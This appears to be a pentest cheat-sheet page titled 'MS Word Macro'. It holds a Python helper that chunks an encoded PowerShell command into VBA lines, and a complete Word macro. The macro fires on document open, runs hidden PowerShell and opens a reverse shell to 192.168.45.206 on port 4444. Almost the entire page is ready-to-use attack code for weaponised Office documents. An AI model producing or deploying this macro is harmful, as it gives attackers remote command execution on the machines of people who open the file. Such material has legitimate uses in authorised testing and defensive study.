Skip to content

MS Word Macro

python3 marco.py

revshell as macro

payload_str = "powershell.exe -nop -w hidden -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMAA2ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="

one_line_max = 50
for i in range(0, len(payload_str), one_line_max):
    print("Str = Str + " + '"' + payload_str[i:i+one_line_max] + '"')

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String

    Str = Str + "powershell.exe -nop -w hidden -enc JABjAGwAaQBlAG4"
    Str = Str + "AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAd"
    Str = Str + "ABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUAB"
    Str = Str + "DAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuA"
    Str = Str + "DIAMAA2ACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACA"
    Str = Str + "APQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAb"
    Str = Str + "QAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA"
    Str = Str + "9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpA"
    Str = Str + "GwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGU"
    Str = Str + "AYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZ"
    Str = Str + "QBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA"
    Str = Str + "7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjA"
    Str = Str + "HQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4"
    Str = Str + "AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAK"
    Str = Str + "QAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAA"
    Str = Str + "wACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgA"
    Str = Str + "CgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8"
    Str = Str + "AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAY"
    Str = Str + "QBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAA"
    Str = Str + "iAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgA"
    Str = Str + "CsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACA"
    Str = Str + "AKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQ"
    Str = Str + "QBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQB"
    Str = Str + "uAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByA"
    Str = Str + "GkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGU"
    Str = Str + "AbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAc"
    Str = Str + "gBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQB"
    Str = Str + "uAHQALgBDAGwAbwBzAGUAKAApAA=="

    CreateObject("Wscript.Shell").Run Str
End Sub